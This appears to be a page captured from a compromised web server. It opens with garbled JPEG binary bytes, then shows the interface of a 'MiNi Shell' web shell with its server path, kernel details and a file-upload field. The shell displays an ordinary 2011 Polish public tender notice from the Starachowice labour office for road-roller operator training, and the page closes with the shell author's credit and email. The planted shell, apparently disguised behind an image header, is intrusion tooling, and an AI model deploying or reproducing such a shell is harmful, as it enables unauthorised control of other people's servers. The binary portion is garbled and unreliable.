JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110421/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110421/87678-N-2011.html

<p class="kh_header"><b>Starachowice: Zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Starachowicach mającego na celu nabycie przez uczestników szkolenia nowych umiejętności i kwalifikacji w zawodzie: 
Operator walca kl. III. Znak sprawy ZP/5/2011</b><br>
<b>Numer ogłoszenia: 87678 - 2011; data zamieszczenia: 21.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Starachowicach , ul. Radomska 76, 27-200 Starachowice, woj. świętokrzyskie, tel. 41 273 62 00, faks 41 273 62 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Starachowicach mającego na celu nabycie przez uczestników szkolenia nowych umiejętności i kwalifikacji w zawodzie: 
Operator walca kl. III. Znak sprawy ZP/5/2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa z zakresu szkolenia. Zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Starachowicach mającego na celu nabycie przez uczestników szkolenia nowych umiejętności i kwalifikacji w zawodzie: 
Operator walca kl. III
Kod zgodnie ze słownikiem CPV 80530000-8. Znak sprawy ZP/5/2011
-	Celem szkolenia jest uzyskanie nowych umiejętności i uprawnień przez uczestników szkolenia.
-	Proponowana liczba godz. :140 według przedłożonego programu szkolenia.
-	Zamówienie ma być zrealizowane zgodnie z programem szkolenia. Wymaga się, aby zajęcia odbywały się codziennie od poniedziałku do piątku. W przypadkach uzasadnionych dopuszcza się odbywanie szkolenia w soboty. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w niedzielę oraz w dni ustawowo wolne od pracy.
-	Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych. Plan nauczania powinien obejmować przeciętnie nie mniej niż 25 godzin zegarowych 
w tygodniu.
-  Miejsce realizacji szkolenia:  miasto Starachowice lub miejscowość w promieniu 60 km od 
     Starachowic, 
-  W przypadku gdy, szkolenie będzie realizowane poza miastem Starachowice, koszty   
     transportu ( dojazdu) uczestników szkolenia pokrywa Wykonawca.
-	Wykonawca zapewni niezbędny sprzęt dla prawidłowego przeprowadzenia szkolenia.
-	Wykonawca zapewni warunki szkolenia zgodne z przepisami bezpieczeństwa i higieny pracy. 
-	Każdy uczestnik szkolenia, w dniu rozpoczęcia zajęć otrzyma materiały piśmienne (zeszyt, długopis, itp.), materiały dydaktyczne (podręczniki, skrypty, inne materiały niezbędne do realizacji szkolenia) oraz szczegółowy harmonogram szkolenia. 
-	Wykonawca zapewni ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników szkolenia z wyjątkiem osób posiadających z tytułu uczestnictwa w szkoleniu prawo do stypendium szkoleniowego.
-     Ewentualny egzamin końcowy zorganizuje i opłaci Wykonawca zamówienia. 
-  Wykonawca wyda dokument (zaświadczenie, certyfikat) potwierdzający ukończenie        
      szkolenia  zawierający numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika   
      szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, 
      nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, 
      okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu 
      potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin 
      zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową 
     przeprowadzającą szkolenie.
-  Zamawiający przewiduje możliwość zmiany np: terminu wykonania zamówienia, liczby 
     uczestników szkolenia przed jego rozpoczęciem. W przypadku zmiany liczby 
     uczestników szkolenia Zamawiający dokona zapłaty za liczbę osób faktycznie  
     rozpoczynających szkolenie (tj. iloczyn liczby osób rozpoczynających szkolenie i kosztu  
     jednostkowego).
-  Zamawiający przewiduje możliwość zmiany przez Wykonawcę kadry dydaktycznej   
     mającej prowadzić to szkolenie pod warunkiem, że nowa kadra zaproponowana przez   
     Wykonawcę będzie posiadać tożsame kwalifikacje z kadrą wymienioną w złożonej 
     ofercie. Zmiana ta wymaga akceptacji Zamawiającego.
- Zamawiający przewiduje możliwość zmiany przez Wykonawcę miejsca odbywania 
     szkolenia pod warunkiem, że nowe miejsce szkolenia/ kursu wskazane przez Wykonawcę 
     będzie mieścić się w tej samej miejscowości, którą wskazał Wykonawca w złożonej 
      ofercie. Zmiana ta wymaga akceptacji Zamawiającego.
-	Wykonawca zapewni serwis kawowy dla uczestników szkolenia.   
-	W przypadku zmiany wysokości podatku VAT  od towarów i usług cena brutto przedmiotu zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku - uprawnienia 
 - Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień  
     publicznych - załącznik nr 1 do SIWZ,   
 - Na podstawie złożonego oświadczenia Wykonawcy o posiadaniu wpisu do 
     rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy 
     ze względu na siedzibę instytucji szkoleniowej /przepisy ustawy z dnia 20.04.2004r. 
    o promocji zatrudnienia i instytucjach rynku pracy art. 20 ust.1/ - załącznik nr 2 do SIWZ.
Zamawiający dokona sprawdzenia w Rejestrze Instytucji Szkoleniowych czy instytucja szkoleniowa posiada w/w wpis oraz czy kontynuuje swoją działalność w bieżącym roku.
- Na podstawie złożonego aktualnego odpisu z właściwego rejestru albo aktualne 
    zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeśli odrębne przepisy 
    wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej 
    wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.    
    Dokument można złożyć w formie oryginału lub kopii poświadczonej za zgodność 
    z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy wskazaną 
    w zaświadczeniu o wpisie do ewidencji działalności gospodarczej lub w odpisie 
    z właściwego rejestru. W przypadku osób działających jako pełnomocnicy do oferty należy 
    dołączyć pełnomocnictwo w formie oryginału lub formie poświadczonej notarialnie kopii.
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń                            i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku - wiedza i doświadczenie 
-   Warunkiem uczestnictwa w postępowaniu jest przeprowadzenie w okresie ostatnich 3 lat 
     przed upływem terminu składania ofert,  a jeżeli  okres prowadzenia działalności jest  
     krótszy - w tym okresie przynajmniej jednego szkolenia o tej samej lub podobnej 
     tematyce.
- Na podstawie złożonych dokumentów potwierdzających przeprowadzenie szkolenia o tej 
    samej lub podobnej tematyce. Dokumentem potwierdzającym przeprowadzenie szkolenia 
    może być np. list referencyjny ewentualnie dokument potwierdzający należyte wykonanie  
    usługi wydany przez jednostkę dla której Wykonawca ubiegający się o udzielenie   
    zamówienia przeprowadził szkolenie o tej samej lub podobnej tematyce. Dokumenty te 
    muszą zawierać termin przeprowadzenia tego szkolenia. 
    W przypadku realizacji projektów współfinansowanych ze środków europejskich przez 
    Wykonawcę ubiegającego się o udzielenie zamówienia dokumentem potwierdzającym 
     spełnienie warunku może być oświadczenie złożone przez Wykonawcę o przeprowadzeniu 
     przynajmniej jednego szkolenia o tej samej lub podobnej tematyce z podaniem daty jego 
     przeprowadzenia, jego wartości oraz nazwy instytucji dla której było przeprowadzane to 
     szkolenia.
- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień 
     publicznych - załącznik nr 1 do SIWZ,
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku - potencjał techniczny 
-  Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień  
     publicznych - załącznik nr 1 do SIWZ,    
- Na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem 
    technicznym zapewniającym wykonanie przedmiotu zamówienia - załącznik nr 3 do SIWZ. 
W przypadku gdy jednostka szkoląca nie posiada własnej bazy szkoleniowej do przeprowadzenia szkolenia na spełnienie tego warunku należy dołączyć dodatkowo umowę przedwstępną użyczenia, dzierżawy, najmu bazy szkoleniowej w której winny zostać określone warunki lokalowe, wyposażenie dydaktyczne, techniczne oraz warunki socjalne. 
W przypadku braku tych zapisów w umowie proszę zawrzeć te informacje w załączniku nr 3 do SIWZ.  
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń                            i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku - osoby zdolne do wykonywania zamówienia 
-  Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień  
     publicznych - załącznik nr 1 do SIWZ,    
-  Na podstawie złożonego oświadczenia o dysponowaniu osobami zdolnymi do wykonania 
     przedmiotu zamówienia - załącznik nr 4 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń                            dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku - sytuacja ekonomiczna i finansowa 
- Na podstawie złożonego oświadczenia o sytuacji finansowej gwarantującej  realizację  
    przedmiotu zamówienia, złożonego oświadczenia o niezaleganiu z opłacaniem  podatków  
    oraz o niezaleganiu z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne 
    i społeczne ewentualnie oświadczenie o uzyskaniu przewidzianym prawem zwolnieniu, 
    odroczeniu lub rozłożeniu na raty zaległych płatności - załącznik nr 5 do SIWZ, 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia                            dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie wymagane</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Kwalifikacje kadry dydaktycznej mającej prowadzić to szkolenie - 10</li>
<li>3 - Certyfikaty, akredytacje posiadanie przez Wykonawcę - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający ze swej strony przewiduje możliwość zmiany np: terminu wykonania 
      zamówienia, liczby uczestników szkolenia przed jego rozpoczęciem. W przypadku 
      zmiany  liczby uczestników szkolenia Zamawiający dokona zapłaty za liczbę osób 
      faktycznie rozpoczynającą szkolenie (tj. iloczyn liczby osób rozpoczynających szkolenie
      i kosztu jednostkowego).
2. Zamawiający przewiduje możliwość zmiany przez Wykonawcę kadry dydaktycznej 
      mającej prowadzić to szkolenie pod warunkiem, że nowa kadra zaproponowana przez 
      Wykonawcę będzie posiadać tożsame kwalifikacje z kadrą wymienioną w złożonej 
      ofercie. Zmiana ta wymaga akceptacji Zamawiającego.
3. Zamawiający przewiduje możliwość zmiany przez Wykonawcę miejsca odbywania 
      szkolenia pod warunkiem, że nowe miejsce szkolenia/ kursu wskazane przez Wykonawcę 
      będzie mieścić się w tej samej miejscowości, którą wskazał Wykonawca w złożonej 
      ofercie. Zmiana ta wymaga akceptacji Zamawiającego.
4. W przypadku zmiany wysokości podatku VAT  od towarów i usług cena brutto przedmiotu 
     zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku
5. Na podstawie art. 145 ustawy prawo zamówień publicznych w razie zaistnienia istotnej 
     zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, 
     czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić 
     od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
     W tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należytego z tytułu 
     wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pup-starachowice.pl 
zakładka zamówienia publiczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2011 godzina 12:00, miejsce: Oferty należy składać w siedzibie zamawiającego : 
Powiatowy Urząd Pracy w Starachowicach, 27-200 Starachowice ul. Radomska 76 w pokoju 210..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com